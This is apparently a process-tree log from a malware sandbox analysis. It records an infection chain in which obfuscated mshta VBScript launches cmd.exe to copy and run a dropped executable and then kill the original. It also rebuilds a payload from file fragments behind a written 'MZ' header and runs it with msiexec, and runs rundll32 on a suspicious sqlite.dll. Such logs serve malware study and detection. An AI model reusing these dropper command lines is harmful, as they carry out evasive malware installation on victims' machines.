C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBSCRIpt: CloSE ( cREatEobJECt( "wsCRIpT.shElL" ). run( "CMd.exE /q /C CoPY /Y ""C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun07b9107c074617.exe"" ..\nU82.eXE && staRT ..\NU82.ExE -pfpj1T6lr~GKuX &IF """" =="""" for %e iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun07b9107c074617.exe"" ) do taskkill /f -im ""%~nxe"" ", 0 ,tRUE ) )6⤵PID:1080
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /C CoPY /Y "C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun07b9107c074617.exe" ..\nU82.eXE &&staRT ..\NU82.ExE -pfpj1T6lr~GKuX &IF "" =="" for %e iN ("C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun07b9107c074617.exe" ) do taskkill /f -im "%~nxe"7⤵PID:3388
-
C:\Users\Admin\AppData\Local\Temp\nU82.eXE..\NU82.ExE -pfpj1T6lr~GKuX8⤵PID:3812
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBSCRIpt: CloSE ( cREatEobJECt( "wsCRIpT.shElL" ). run( "CMd.exE /q /C CoPY /Y ""C:\Users\Admin\AppData\Local\Temp\nU82.eXE"" ..\nU82.eXE && staRT ..\NU82.ExE -pfpj1T6lr~GKuX &IF ""-pfpj1T6lr~GKuX "" =="""" for %e iN ( ""C:\Users\Admin\AppData\Local\Temp\nU82.eXE"" ) do taskkill /f -im ""%~nxe"" ", 0 ,tRUE ) )9⤵PID:4208
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /C CoPY /Y "C:\Users\Admin\AppData\Local\Temp\nU82.eXE" ..\nU82.eXE &&staRT ..\NU82.ExE -pfpj1T6lr~GKuX &IF "-pfpj1T6lr~GKuX " =="" for %e iN ("C:\Users\Admin\AppData\Local\Temp\nU82.eXE" ) do taskkill /f -im "%~nxe"10⤵PID:4928
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscrIPT: CLOSE(cREATeOBJecT ( "wSCRIpT.ShELl" ). run ("cmd /q /R echo FZm4VC:\Users\Admin\AppData\Local\Tempg5i> UX2~UVnN.VM2 & eChO | sET /p = ""MZ"" > 4LNjycCw.Z2 & coPy /Y /b 4lNjyCCw.Z2 +I8PJbEWl.S +2PhmN.E8 + 5Fn2PWY8.H + F3QYhGW.Jz + NXKZ.hO + UX2~UVNN.vM2 ..\vFeGMw.qLW & DEL /Q *& STArt msiexec.exe -y ..\vFEGMW.QlW " , 0 ,trUE) )9⤵PID:4616
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /R echo FZm4VC:\Users\Admin\AppData\Local\Tempg5i> UX2~UVnN.VM2 &eChO | sET /p = "MZ" > 4LNjycCw.Z2 & coPy /Y /b 4lNjyCCw.Z2 +I8PJbEWl.S+2PhmN.E8 + 5Fn2PWY8.H + F3QYhGW.Jz +NXKZ.hO +UX2~UVNN.vM2 ..\vFeGMw.qLW &DEL /Q *& STArt msiexec.exe -y ..\vFEGMW.QlW10⤵PID:1272
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eChO "11⤵PID:5108
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" sET /p = "MZ" 1>4LNjycCw.Z2"11⤵PID:4908
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y ..\vFEGMW.QlW11⤵PID:4724
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f -im "Sun07b9107c074617.exe"8⤵
- Kills process with taskkill
PID:4128
-
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1104 -s 5884⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3076
-
-
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:4180 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:4224
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:4424